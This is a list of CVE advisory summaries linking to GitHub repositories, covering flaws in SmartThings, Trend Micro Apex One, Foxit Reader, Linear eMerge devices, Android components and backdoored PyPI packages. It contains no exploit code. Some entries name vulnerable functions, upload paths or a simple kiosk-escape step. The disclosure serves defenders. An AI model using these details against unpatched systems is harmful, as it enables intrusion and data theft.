**Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via REMOVE_PERSISTENT_BANNER broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39869](https://github.com/Live-Hack-CVE/CVE-2022-39869) create time: 2022-12-29T06:21:07Z

**An improper certification validation vulnerability in Trend Micro Apex One agents could allow a local attacker to load a DLL file with system service privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41747](https://github.com/Live-Hack-CVE/CVE-2022-41747) create time: 2022-12-29T06:20:57Z

**Improper access control vulnerability in GedSamsungAccount.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39868](https://github.com/Live-Hack-CVE/CVE-2022-39868) create time: 2022-12-29T06:20:49Z

**A registry permissions vulnerability in the Trend Micro Apex One Data Loss Prevention (DLP) module could allow a local attacker with administrative credentials to bypass certain elements of the product's anti-tampering mechanisms on affected installations. Please note: an attacker must first obtain administrative crede CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41748](https://github.com/Live-Hack-CVE/CVE-2022-41748) create time: 2022-12-29T06:20:46Z

**Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via SHOW_PERSISTENT_BANNER broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39867](https://github.com/Live-Hack-CVE/CVE-2022-39867) create time: 2022-12-29T06:20:43Z

**Improper access control vulnerability in RegisteredEventMediator.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39866](https://github.com/Live-Hack-CVE/CVE-2022-39866) create time: 2022-12-29T06:20:36Z

**Improper access control vulnerability in ContentsSharingActivity.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39865](https://github.com/Live-Hack-CVE/CVE-2022-39865) create time: 2022-12-29T06:20:13Z

**A forced browsing vulnerability in Trend Micro Apex One could allow an attacker with access to the Apex One console on affected installations to escalate privileges and modify certain agent groupings. Please note: an attacker must first obtain the ability to log onto the Apex One web console in order to exploit this vu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41746](https://github.com/Live-Hack-CVE/CVE-2022-41746) create time: 2022-12-29T06:20:06Z

**Konica Minolta bizhub MFP devices before 2022-04-14 allow a Sandbox Escape. An attacker must attach a keyboard to a USB port, press F12, and then escape from the kiosk mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29586](https://github.com/Live-Hack-CVE/CVE-2022-29586) create time: 2022-12-29T06:19:40Z

**An Out-of-Bounds access vulnerability in Trend Micro Apex One could allow a local attacker to create a specially crafted message to cause memory corruption on a certain service process which could lead to local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to exe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41745](https://github.com/Live-Hack-CVE/CVE-2022-41745) create time: 2022-12-29T06:19:34Z

**An Improper Privilege Management in crowbar of SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud 9, SUSE OpenStack Cloud Crowbar 8, SUSE OpenStack Cloud Crowbar 9 allows root users on any crowbar managed node to cause become root on any other node. This issue affects: SUSE OpenStack Cloud 7 crowbar-c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17954](https://github.com/Live-Hack-CVE/CVE-2018-17954) create time: 2022-12-29T04:59:14Z

**dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 2 of 2). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18447](https://github.com/Live-Hack-CVE/CVE-2018-18447) create time: 2022-12-29T04:54:29Z

**dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 1 of 2). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18446](https://github.com/Live-Hack-CVE/CVE-2018-18446) create time: 2022-12-29T04:54:26Z

**Interspire Email Marketer through 6.5.0 allows arbitrary file upload via a surveys_submit.php "create survey and submit survey" operation, which can cause a .php file to be accessible under a /admin/temp/surveys/ URI. NOTE: this issue exists because of an incomplete fix for CVE-2018-19550. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40777](https://github.com/Live-Hack-CVE/CVE-2022-40777) create time: 2022-12-29T04:53:00Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XFA Template CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6764](https://github.com/Live-Hack-CVE/CVE-2019-6764) create time: 2022-12-29T04:54:15Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Xiaomi Mi6 Browser prior to 10.4.0. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the WebAssembly.Inst CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6743](https://github.com/Live-Hack-CVE/CVE-2019-6743) create time: 2022-12-29T04:54:12Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit PhantomPDF 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the conversion of HTML fil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6765](https://github.com/Live-Hack-CVE/CVE-2019-6765) create time: 2022-12-29T04:54:09Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6766](https://github.com/Live-Hack-CVE/CVE-2019-6766) create time: 2022-12-29T04:54:05Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method when pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6767](https://github.com/Live-Hack-CVE/CVE-2019-6767) create time: 2022-12-29T04:54:02Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method when pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6768](https://github.com/Live-Hack-CVE/CVE-2019-6768) create time: 2022-12-29T04:53:32Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method when pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6769](https://github.com/Live-Hack-CVE/CVE-2019-6769) create time: 2022-12-29T04:53:28Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the resetForm method w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6770](https://github.com/Live-Hack-CVE/CVE-2019-6770) create time: 2022-12-29T04:53:25Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 2019.010.20098. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6771](https://github.com/Live-Hack-CVE/CVE-2019-6771) create time: 2022-12-29T04:53:21Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 2019.010.20098. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField met CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6772](https://github.com/Live-Hack-CVE/CVE-2019-6772) create time: 2022-12-29T04:53:18Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the ri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6773](https://github.com/Live-Hack-CVE/CVE-2019-6773) create time: 2022-12-29T04:53:15Z

**Optergy Proton/Enterprise devices allow Open Redirect. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7275](https://github.com/Live-Hack-CVE/CVE-2019-7275) create time: 2022-12-29T04:53:08Z

**Optergy Proton/Enterprise devices allow Cross-Site Request Forgery (CSRF). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7273](https://github.com/Live-Hack-CVE/CVE-2019-7273) create time: 2022-12-29T04:53:04Z

**Optergy Proton/Enterprise devices allow Authenticated File Upload with Code Execution as root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7274](https://github.com/Live-Hack-CVE/CVE-2019-7274) create time: 2022-12-29T04:52:57Z

**Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7265](https://github.com/Live-Hack-CVE/CVE-2019-7265) create time: 2022-12-29T04:52:54Z

**Linear eMerge 50P/5000P devices allow Authentication Bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7266](https://github.com/Live-Hack-CVE/CVE-2019-7266) create time: 2022-12-29T04:52:47Z

**Linear eMerge 50P/5000P devices allow Cookie Path Traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7267](https://github.com/Live-Hack-CVE/CVE-2019-7267) create time: 2022-12-29T04:52:43Z

**Linear eMerge 50P/5000P devices allow Unauthenticated File Upload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7268](https://github.com/Live-Hack-CVE/CVE-2019-7268) create time: 2022-12-29T04:52:40Z

**Linear eMerge 50P/5000P devices allow Authenticated Command Injection with root Code Execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7269](https://github.com/Live-Hack-CVE/CVE-2019-7269) create time: 2022-12-29T04:52:36Z

**Linear eMerge 50P/5000P devices allow Cross-Site Request Forgery (CSRF). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7270](https://github.com/Live-Hack-CVE/CVE-2019-7270) create time: 2022-12-29T04:51:28Z

**Linear eMerge E3-Series devices allow Authorization Bypass with Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7259](https://github.com/Live-Hack-CVE/CVE-2019-7259) create time: 2022-12-29T04:51:24Z

**Linear eMerge E3-Series devices allow Cross-Site Request Forgery (CSRF). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7262](https://github.com/Live-Hack-CVE/CVE-2019-7262) create time: 2022-12-29T04:51:21Z

**Linear eMerge E3-Series devices have Hard-coded Credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7261](https://github.com/Live-Hack-CVE/CVE-2019-7261) create time: 2022-12-29T04:51:10Z

**Linear eMerge E3-Series devices allow XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7255](https://github.com/Live-Hack-CVE/CVE-2019-7255) create time: 2022-12-29T04:51:06Z

**Linear eMerge E3-Series devices allow Command Injections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7256](https://github.com/Live-Hack-CVE/CVE-2019-7256) create time: 2022-12-29T04:51:03Z

**Linear eMerge E3-Series devices allow Unrestricted File Upload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7257](https://github.com/Live-Hack-CVE/CVE-2019-7257) create time: 2022-12-29T04:50:59Z

**Linear eMerge E3-Series devices allow Privilege Escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7258](https://github.com/Live-Hack-CVE/CVE-2019-7258) create time: 2022-12-29T04:50:56Z

**In the Android kernel in F2FS driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9445](https://github.com/Live-Hack-CVE/CVE-2019-9445) create time: 2022-12-29T04:50:52Z

**In the Android kernel in F2FS touch driver there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9453](https://github.com/Live-Hack-CVE/CVE-2019-9453) create time: 2022-12-29T04:50:49Z

**The Xiaomi Security Center expresses heartfelt thanks to ADLab of VenusTech ! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14131](https://github.com/Live-Hack-CVE/CVE-2020-14131) create time: 2022-12-29T04:59:00Z

**A logic vulnerability exists in a Xiaomi product. The vulnerability is caused by an identity verification failure, which can be exploited by an attacker who can obtain a brief elevation of privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14129](https://github.com/Live-Hack-CVE/CVE-2020-14129) create time: 2022-12-29T04:58:57Z

**During installation or upgrade to Software House C•CURE 9000 v2.70 and American Dynamics victor Video Management System v5.2, the credentials of the user used to perform the installation or upgrade are logged in a file. The install log file persists after the installation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9045](https://github.com/Live-Hack-CVE/CVE-2020-9045) create time: 2022-12-29T04:55:50Z

**In dllist_remove_node of TBD, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242344778 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0696](https://github.com/Live-Hack-CVE/CVE-2021-0696) create time: 2022-12-29T05:00:16Z

**In DevmemIntHeapAcquire of TBD, there is a possible arbitrary code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345085 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0951](https://github.com/Live-Hack-CVE/CVE-2021-0951) create time: 2022-12-29T05:00:13Z

**Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36915](https://github.com/Live-Hack-CVE/CVE-2021-36915) create time: 2022-12-29T05:00:09Z

**Unauthenticated Options Change and Content Injection vulnerability in Qube One Redirection for Contact Form 7 plugin <= 2.4.0 at WordPress allows attackers to change options and inject scripts into the footer HTML. Requires an additional extension (plugin) AccessiBe. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36913](https://github.com/Live-Hack-CVE/CVE-2021-36913) create time: 2022-12-29T04:55:00Z

**There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221238 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20431](https://github.com/Live-Hack-CVE/CVE-2022-20431) create time: 2022-12-29T05:02:22Z

**There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242244028 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20434](https://github.com/Live-Hack-CVE/CVE-2022-20434) create time: 2022-12-29T05:02:19Z

**In Messaging, There has unauthorized provider, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242266172 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20439](https://github.com/Live-Hack-CVE/CVE-2022-20439) create time: 2022-12-29T05:02:09Z

**SAP Customer Data Cloud (Gigya mobile app for Android) - version 7.4, uses insecure random number generator program which makes it easy for the attacker to predict future random numbers. This can lead to information disclosure and modification of certain user settings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41210](https://github.com/Live-Hack-CVE/CVE-2022-41210) create time: 2022-12-29T05:02:05Z

**There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221901 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20433](https://github.com/Live-Hack-CVE/CVE-2022-20433) create time: 2022-12-29T05:02:01Z

**SAP Customer Data Cloud (Gigya mobile app for Android) - version 7.4, uses encryption method which lacks proper diffusion and does not hide the patterns well. This can lead to information disclosure. In certain scenarios, application might also be susceptible to replay attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41209](https://github.com/Live-Hack-CVE/CVE-2022-41209) create time: 2022-12-29T05:01:58Z

**SAP BusinessObjects Business Intelligence platform (Analysis for OLAP) - versions 420, 430, allows an authenticated attacker to send user-controlled inputs when OLAP connections are created and edited in the Central Management Console. On successful exploitation, there could be a limited impact on confidentiality and i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41206](https://github.com/Live-Hack-CVE/CVE-2022-41206) create time: 2022-12-29T05:01:54Z

**An attacker can change the content of an SAP Commerce - versions 1905, 2005, 2105, 2011, 2205, login page through a manipulated URL. They can inject code that allows them to redirect submissions from the affected login form to their own server. This allows them to steal credentials and hijack accounts. A successful att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41204](https://github.com/Live-Hack-CVE/CVE-2022-41204) create time: 2022-12-29T05:01:51Z

**In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242259920 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20438](https://github.com/Live-Hack-CVE/CVE-2022-20438) create time: 2022-12-29T05:01:35Z

**There is an missing authorization issue in the system service. Since the component does not have permission check and permission protection,, resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221899 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20432](https://github.com/Live-Hack-CVE/CVE-2022-20432) create time: 2022-12-29T05:01:31Z

**There is a Unauthorized service in the system service, may cause the system reboot. Since the component does not have permission check and permission protection, resulting in EoP problem.Product: AndroidVersions: Android SoCAndroid ID: A-242248367 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20435](https://github.com/Live-Hack-CVE/CVE-2022-20435) create time: 2022-12-29T05:01:27Z

**There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221233 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20430](https://github.com/Live-Hack-CVE/CVE-2022-20430) create time: 2022-12-29T05:01:24Z

**The d8s-lists package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42039](https://github.com/Live-Hack-CVE/CVE-2022-42039) create time: 2022-12-29T05:01:21Z

**The d8s-urls package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42036](https://github.com/Live-Hack-CVE/CVE-2022-42036) create time: 2022-12-29T05:01:17Z

**The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42037](https://github.com/Live-Hack-CVE/CVE-2022-42037) create time: 2022-12-29T05:01:14Z

**The d8s-algorithms package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42040](https://github.com/Live-Hack-CVE/CVE-2022-42040) create time: 2022-12-29T05:01:10Z

**The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42041](https://github.com/Live-Hack-CVE/CVE-2022-42041) create time: 2022-12-29T05:01:06Z

**The d8s-xml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42043](https://github.com/Live-Hack-CVE/CVE-2022-42043) create time: 2022-12-29T05:01:03Z

**The d8s-networking package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42042](https://github.com/Live-Hack-CVE/CVE-2022-42042) create time: 2022-12-29T05:00:59Z

**The d8s-ip-addresses package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42038](https://github.com/Live-Hack-CVE/CVE-2022-42038) create time: 2022-12-29T05:00:55Z

**The d8s-pdfs package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41387](https://github.com/Live-Hack-CVE/CVE-2022-41387) create time: 2022-12-29T05:00:24Z

**The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42044](https://github.com/Live-Hack-CVE/CVE-2022-42044) create time: 2022-12-29T05:00:20Z

**In getInputMethodWindowVisibleHeight of InputMethodManagerService.java, there is a possible way to determine when another app is showing an IME due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.P CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20394](https://github.com/Live-Hack-CVE/CVE-2022-20394) create time: 2022-12-29T05:00:06Z

**In avrc_ctrl_pars_vendor_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20410](https://github.com/Live-Hack-CVE/CVE-2022-20410) create time: 2022-12-29T05:00:02Z

**In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20416](https://github.com/Live-Hack-CVE/CVE-2022-20416) create time: 2022-12-29T04:59:58Z

**In fdt_next_tag of fdt.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20412](https://github.com/Live-Hack-CVE/CVE-2022-20412) create time: 2022-12-29T04:59:55Z

**In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20417](https://github.com/Live-Hack-CVE/CVE-2022-20417) create time: 2022-12-29T04:59:52Z

**In handleFullScreenIntent of StatusBarNotificationActivityStarter.java, there is a possible bypass of the restriction of starting activity from background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20415](https://github.com/Live-Hack-CVE/CVE-2022-20415) create time: 2022-12-29T04:59:48Z

**In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20413](https://github.com/Live-Hack-CVE/CVE-2022-20413) create time: 2022-12-29T04:59:43Z

**In pickStartSeq of AAVCAssembler.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20418](https://github.com/Live-Hack-CVE/CVE-2022-20418) create time: 2022-12-29T04:59:40Z

**An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function ilst_item_Read() in isomedia/box_code_apple.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20165](https://github.com/Live-Hack-CVE/CVE-2019-20165) create time: 2022-12-29T03:36:10Z

**An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function ReadGF_IPMPX_WatermarkingInit() in odf/ipmpx_code.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20161](https://github.com/Live-Hack-CVE/CVE-2019-20161) create time: 2022-12-29T03:36:07Z

**An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function gf_isom_box_parse_ex() in isomedia/box_funcs.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20162](https://github.com/Live-Hack-CVE/CVE-2019-20162) create time: 2022-12-29T03:36:03Z

**An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_odf_avc_cfg_write_bs() in odf/descriptors.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20163](https://github.com/Live-Hack-CVE/CVE-2019-20163) create time: 2022-12-29T03:36:00Z

**An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is an invalid pointer dereference in the function GF_IPMPX_AUTH_Delete() in odf/ipmpx_code.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20170](https://github.com/Live-Hack-CVE/CVE-2019-20170) create time: 2022-12-29T03:36:14Z

**In yast2-samba-provision up to and including version 1.0.1 the password for samba shares was provided on the command line to tools used by yast2-samba-provision, allowing local attackers to read them in the process list CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17956](https://github.com/Live-Hack-CVE/CVE-2018-17956) create time: 2022-12-29T03:35:45Z

**In libvpx, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-122675483 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9232](https://github.com/Live-Hack-CVE/CVE-2019-9232) create time: 2022-12-29T04:20:44Z

**In libexif, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege in the media content provider with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-112537774 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9278](https://github.com/Live-Hack-CVE/CVE-2019-9278) create time: 2022-12-29T04:20:41Z

**In libhidcommand_jni, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the USB service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: Android Versions: Android-10 Android ID: A-111363077 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9288](https://github.com/Live-Hack-CVE/CVE-2019-9288) create time: 2022-12-29T04:20:37Z

**In libvpx, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-112001302 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9325](https://github.com/Live-Hack-CVE/CVE-2019-9325) create time: 2022-12-29T04:20:34Z

**A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8764](https://github.com/Live-Hack-CVE/CVE-2019-8764) create time: 2022-12-29T04:20:31Z

**An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, watchOS 5.2. A user’s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8550](https://github.com/Live-Hack-CVE/CVE-2019-8550) create time: 2022-12-29T04:20:05Z

**A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13. Processing maliciously crafted web content may lead to universal cross site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8674](https://github.com/Live-Hack-CVE/CVE-2019-8674) create time: 2022-12-29T04:20:01Z

